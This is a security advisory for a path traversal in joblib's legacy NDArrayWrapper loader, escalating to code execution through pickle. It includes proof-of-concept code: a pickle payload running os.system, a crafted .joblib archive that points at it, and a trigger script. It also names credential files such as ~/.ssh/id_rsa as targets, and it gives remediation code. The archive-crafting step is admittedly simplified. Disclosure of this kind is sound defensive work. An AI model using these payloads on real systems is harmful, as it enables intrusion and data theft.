Vulnerability Report: Joblib NDArrayWrapper Path Traversal to Remote Code Execution

Target Info

| Field | Details |
| --- | --- |
| Project | joblib |
| Affected File | joblib/numpy_pickle_compat.py |
| Affected Class / Method | NDArrayWrapper.read() |
| Affected Versions | All versions with legacy multi-file .joblib format support |
| CWE | CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
| CVSS v3.1 Score | 10.0 (Critical) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

Executive Summary

The NDArrayWrapper.read() method in joblib/numpy_pickle_compat.py builds a filesystem path by joining a trusted base directory with a filename read from inside the .joblib archive. The join uses os.path.join(), which silently discards every preceding component when it encounters an absolute one. An attacker who supplies a .joblib file with self.filename set to an absolute path (e.g., /etc/passwd or /tmp/malicious.npy) can therefore direct the loader to open any file the loading process can read.

When allow_pickle=True (the default in NumPy releases before 1.16.3), this path traversal escalates to Remote Code Execution: the attacker-controlled .npy file can contain a pickled payload that executes arbitrary code at load time.


Root Cause Analysis

Vulnerable Code

File: joblib/numpy_pickle_compat.py

class NDArrayWrapper(object):
    """An object to be used in replacement of a pickle array.

    NDArrayWrapper is used to read back arrays stored in separate .npy files
    inside a joblib pickle.
    """

    def __init__(self, filename, subclass, allow_pickle=False):
        self.filename = filename          # ← comes directly from pickle stream
        self.subclass = subclass
        self.allow_pickle = allow_pickle

    def read(self, unpickler):
        filepath = os.path.join(unpickler._dirname, self.filename)
        # If self.filename = '/etc/passwd'   → filepath = '/etc/passwd'
        # If self.filename = '/tmp/evil.npy' → filepath = '/tmp/evil.npy'
        # os.path.join() silently ignores unpickler._dirname when self.filename is absolute!

        array = unpickler.np.load(
            filepath,
            allow_pickle=self.allow_pickle   # ← RCE if True and file contains pickle data
        )
        return array

Root Cause

The vulnerability has two components:

1. Path Traversal (CWE-22): Python's os.path.join(base, component) returns component unchanged if it is an absolute path. There is no call to os.path.realpath(), os.path.normpath(), or any prefix check to verify the resolved path remains under unpickler._dirname.

2. Pickle RCE Escalation: self.allow_pickle is also deserialized from the attacker-controlled archive. Combined with the path traversal, the attacker can:

  • Place a malicious .npy file (containing a pickled payload) at a predictable location (e.g., via a prior upload, /tmp/, a world-writable directory)
  • Set self.filename = '/tmp/evil.npy' and self.allow_pickle = True
  • Force joblib to load that file, triggering arbitrary code execution
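The second component depends on how pickle rebuilds instances by default: it creates the object without calling __init__ and then restores the saved attribute dictionary, so a safe default such as allow_pickle=False in the constructor never runs at load time. A minimal sketch of that mechanism follows; Wrapper and restore are illustrative stand-ins, not joblib code.

```python
class Wrapper:
    """Stand-in for a wrapper class whose constructor has a safe default."""

    init_calls = 0

    def __init__(self, filename, allow_pickle=False):
        Wrapper.init_calls += 1
        self.filename = filename
        self.allow_pickle = allow_pickle


def restore(cls, attributes):
    """Mirror pickle's default reconstruction: skip __init__, restore attributes."""
    obj = cls.__new__(cls)
    obj.__dict__.update(attributes)
    return obj


# Attribute values as they would arrive from a serialized stream.
stored_state = {"filename": "array_0.npy", "allow_pickle": True}
restored = restore(Wrapper, stored_state)

print(Wrapper.init_calls)     # number of times the constructor ran
print(restored.allow_pickle)  # value taken from the stored state
```

Any attribute that influences a security decision is therefore only as trustworthy as the stream it was read from.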

Python os.path.join() Behavior (Demonstration)

import os
os.path.join('/trusted/base', '/etc/passwd')
# Returns: '/etc/passwd'  ← base is silently dropped!

os.path.join('/trusted/base', '../../../etc/passwd')
# Returns: '/trusted/base/../../../etc/passwd'  ← traversal via relative path

Both absolute paths and relative .. sequences escape the intended directory.
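Normalizing the joined path makes it easier to see where each case actually points. The sketch below uses posixpath so the behavior is the same on any platform; the base directory and filenames are the illustrative ones used in this report, plus one benign relative name for contrast.

```python
import posixpath

base = "/trusted/base"
candidates = ("/etc/passwd", "../../../etc/passwd", "arrays/data.npy")

resolved = {}
for name in candidates:
    joined = posixpath.join(base, name)
    # normpath collapses '..' segments lexically; it does not follow symlinks.
    resolved[name] = posixpath.normpath(joined)

for name, path in resolved.items():
    inside = path.startswith(base + "/")
    print(f"{name!r} -> {path!r} (inside base: {inside})")
```

Because normpath works purely on the string, a real containment check would also need os.path.realpath() to account for symbolic links.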

Inconsistency Evidence

The safer pattern used in other parts of joblib and in standard library code validates that the resolved path starts with the expected base:

# Secure pattern (NOT used in NDArrayWrapper):
def safe_join(base_dir, filename):
    base_dir = os.path.realpath(base_dir)
    filepath = os.path.realpath(os.path.join(base_dir, filename))
    if not filepath.startswith(base_dir + os.sep):
        raise ValueError(
            f"Path traversal detected: {filename!r} escapes base directory"
        )
    return filepath

Modern zipfile and tarfile implementations in the Python standard library enforce similar containment checks. The NDArrayWrapper code predates these conventions and was never updated.
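One detail of the containment pattern is easy to get wrong: the separator appended before the prefix comparison. Without it, a sibling directory whose name merely begins with the base name passes the check. The sketch below contrasts a bare prefix test with a component-wise test built on posixpath.commonpath; the function names and paths are hypothetical and chosen only for illustration.

```python
import posixpath


def naive_is_inside(base, path):
    """Bare string prefix test, with no separator appended to the base."""
    return path.startswith(base)


def is_inside(base, path):
    """Component-wise containment test for normalized absolute paths."""
    return posixpath.commonpath([base, path]) == base


base = "/srv/models"
sibling = "/srv/models_evil/payload.npy"
child = "/srv/models/run1/array_0.npy"

print(naive_is_inside(base, sibling))  # bare prefix test on a sibling directory
print(is_inside(base, sibling))        # component-wise test on the same path
print(is_inside(base, child))          # component-wise test on a real child
```

In production code both arguments would first be passed through os.path.realpath() so that symbolic links cannot defeat the comparison.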


Proof of Concept

Prerequisites

pip install joblib numpy

Step 1: Create a malicious .npy payload (RCE)

#!/usr/bin/env python3
"""
Stage 1: Create a malicious .npy file containing a pickle payload.
This file will be placed at a predictable location (simulating /tmp/).
"""
import os

import numpy as np

class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ('id > /tmp/pwned.txt',))

# Craft a .npy file that embeds pickle data
# (numpy's allow_pickle=True triggers pickle deserialization)
malicious_array = np.array(MaliciousPayload())

np.save('/tmp/evil.npy', malicious_array, allow_pickle=True)
print("Malicious .npy written to /tmp/evil.npy")

Step 2: Craft the malicious .joblib archive

#!/usr/bin/env python3
"""
Stage 2: Craft a .joblib archive that references /tmp/evil.npy
via the NDArrayWrapper.filename field.
"""
import pickle

# Manually craft a pickle stream that instantiates NDArrayWrapper
# with filename='/tmp/evil.npy' and allow_pickle=True
class FakeNDArrayWrapper:
    """Mimics joblib.numpy_pickle_compat.NDArrayWrapper for crafting purposes."""
    def __init__(self):
        self.filename = '/tmp/evil.npy'     # ← absolute path traversal
        self.subclass = None
        self.allow_pickle = True            # ← enable pickle RCE

# Serialize using standard pickle
payload = pickle.dumps(FakeNDArrayWrapper())

with open('malicious.joblib', 'wb') as f:
    # Write joblib file magic + crafted object
    # (exact format depends on joblib version; simplified here for clarity)
    f.write(payload)

print("Malicious .joblib written to malicious.joblib")

Step 3: Trigger the path traversal + RCE

import os

import joblib

# Victim loads the attacker-supplied file
result = joblib.load('malicious.joblib')

# Check for RCE evidence
if os.path.exists('/tmp/pwned.txt'):
    with open('/tmp/pwned.txt') as f:
        print(f"[RCE CONFIRMED] Command output: {f.read()}")

Step 4: Path traversal (read-only, without RCE)

#!/usr/bin/env python3
"""
Path traversal PoC without RCE: shows that the attacker fully controls
the path handed to the loader.
self.filename = '/etc/passwd', allow_pickle=False
"""
import os

# Demonstrate os.path.join behavior
base = '/some/trusted/directory'
attacker_filename = '/etc/passwd'

result = os.path.join(base, attacker_filename)
print(f"os.path.join result: {result}")
# Output: /etc/passwd (base is completely ignored)
assert result == '/etc/passwd'
print("Path traversal confirmed: attacker controls file path")

Expected Output (RCE)

[RCE CONFIRMED] Command output: uid=1000(victim) gid=1000(victim) groups=1000(victim)

Impact

Path Traversal: High

  • Any file readable by the process can be accessed by setting self.filename to its absolute path.
  • Sensitive files at predictable paths (/etc/passwd, ~/.ssh/id_rsa, application config files, database credentials) are exposed.

Remote Code Execution: Critical (when allow_pickle=True)

  • Full arbitrary code execution in the context of the loading process.
  • Attacker controls allow_pickle from within the archive, overriding caller intent.
  • Combined with a prior file write (upload endpoint, /tmp/ race, world-writable directory), a network attacker achieves RCE with no local foothold.

Scope: Changed. Code execution can escape the application sandbox, affect other users on a shared system, or pivot to internal network resources.


CVSS Score

Score: 10.0 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

| Metric | Value | Rationale |
| --- | --- | --- |
| Attack Vector (AV) | Network (N) | Exploitable via remote file upload or model serving endpoint |
| Attack Complexity (AC) | Low (L) | No race conditions or special configuration needed; os.path.join behavior is deterministic |
| Privileges Required (PR) | None (N) | No authentication; any user who can supply a .joblib file triggers the vulnerability |
| User Interaction (UI) | None (N) | Server-side automatic loading, no victim action needed |
| Scope (S) | Changed (C) | RCE can escape the application context; affects other processes and the OS |
| Confidentiality (C) | High (H) | Arbitrary file read; RCE gives full data access |
| Integrity (I) | High (H) | RCE allows writing files, modifying data, persisting backdoors |
| Availability (A) | High (H) | RCE can crash, corrupt, or delete critical resources |
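A headline score can be cross-checked against its vector string by evaluating the CVSS v3.1 base score equations directly. The sketch below implements those equations with the metric weights from the specification; the function and constant names are illustrative, and temporal and environmental metrics are not handled.

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place, as defined by the specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the CVSS v3.1 base score for a vector string."""
    prefix, *items = vector.split("/")
    if not prefix.startswith("CVSS:3."):
        raise ValueError(f"unsupported vector: {vector!r}")
    m = dict(item.split(":") for item in items)
    changed = m["S"] == "C"

    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]

    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"))
```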

Remediation

Fix: Validate resolved path is within the base directory

# joblib/numpy_pickle_compat.py

import os

def _safe_join(base_dir, filename):
    """Join paths and verify the result stays within base_dir."""
    base_dir = os.path.realpath(base_dir)
    # Reject absolute paths immediately
    if os.path.isabs(filename):
        raise ValueError(
            f"NDArrayWrapper filename must be a relative path, got: {filename!r}"
        )
    # Resolve and verify containment
    filepath = os.path.realpath(os.path.join(base_dir, filename))
    if os.path.commonpath([base_dir, filepath]) != base_dir:
        raise ValueError(
            f"Path traversal detected: {filename!r} resolves outside of "
            f"base directory {base_dir!r}"
        )
    return filepath


class NDArrayWrapper(object):
    def read(self, unpickler):
        # FIX: Use _safe_join instead of bare os.path.join
        filepath = _safe_join(unpickler._dirname, self.filename)

        # FIX: Do not trust allow_pickle from the archive;
        # use a caller-controlled parameter instead
        allow_pickle = getattr(unpickler, '_allow_pickle', False)

        array = unpickler.np.load(filepath, allow_pickle=allow_pickle)
        return array
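A containment check of this kind is straightforward to exercise in isolation. The sketch below restates the helper so the block is self-contained (using os.path.commonpath for the containment test) and runs it against a temporary directory; safe_join and is_rejected are illustrative names, and this is not a test from the joblib code base.

```python
import os
import tempfile


def safe_join(base_dir, filename):
    """Join paths and verify the result stays within base_dir (demo restatement)."""
    base_dir = os.path.realpath(base_dir)
    if os.path.isabs(filename):
        raise ValueError(f"absolute path rejected: {filename!r}")
    filepath = os.path.realpath(os.path.join(base_dir, filename))
    if os.path.commonpath([base_dir, filepath]) != base_dir:
        raise ValueError(f"path escapes base directory: {filename!r}")
    return filepath


def is_rejected(base_dir, filename):
    """Return True if safe_join refuses the filename."""
    try:
        safe_join(base_dir, filename)
    except ValueError:
        return True
    return False


with tempfile.TemporaryDirectory() as base:
    # abspath keeps the example absolute on both POSIX and Windows.
    absolute_name = os.path.abspath(os.path.join(os.sep, "tmp", "evil.npy"))
    results = {
        "relative": is_rejected(base, "array_0.npy"),
        "absolute": is_rejected(base, absolute_name),
        "dotdot": is_rejected(base, os.path.join("..", "evil.npy")),
    }
    inside = safe_join(base, "array_0.npy")
    inside_ok = inside == os.path.join(os.path.realpath(base), "array_0.npy")

print(results)
```

Resolving both paths with os.path.realpath() before comparing them means a symbolic link inside the base directory that points elsewhere is rejected as well.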

Additional Recommendations

  1. Never inherit allow_pickle from archive data. The allow_pickle flag should be a parameter passed by the caller (joblib.load(..., allow_pickle=False)) and never deserializable from within the untrusted file itself.
  2. Consider removing legacy ZF/multi-file format support if the modern format is available. Legacy format code paths represent a disproportionate attack surface.
  3. Add a security notice to joblib.load() documentation: "Do not load .joblib files from untrusted sources."
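As one way to act on the third recommendation, a caller can refuse to hand a file to joblib.load() unless it matches a digest obtained through a trusted channel. The sketch below is an assumption about how such a gate might look, not part of joblib: verify_sha256 and the placeholder artifact are hypothetical, and only the standard library is used.

```python
import hashlib
import hmac
import os
import tempfile


def verify_sha256(path, expected_hex):
    """Return True only if the file's SHA-256 digest matches expected_hex."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    # compare_digest performs a constant-time comparison.
    return hmac.compare_digest(digest.hexdigest(), expected_hex.lower())


# Demonstration with a throwaway file standing in for a model artifact.
with tempfile.TemporaryDirectory() as workdir:
    artifact = os.path.join(workdir, "model.joblib")
    with open(artifact, "wb") as handle:
        handle.write(b"placeholder bytes")
    trusted_digest = hashlib.sha256(b"placeholder bytes").hexdigest()

    accepted = verify_sha256(artifact, trusted_digest)
    rejected = verify_sha256(artifact, "0" * 64)

print(accepted, rejected)
```

Only after the check succeeds would the caller pass the path to joblib.load(). A digest check establishes where a file came from; it does not make the file format itself safe to parse.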
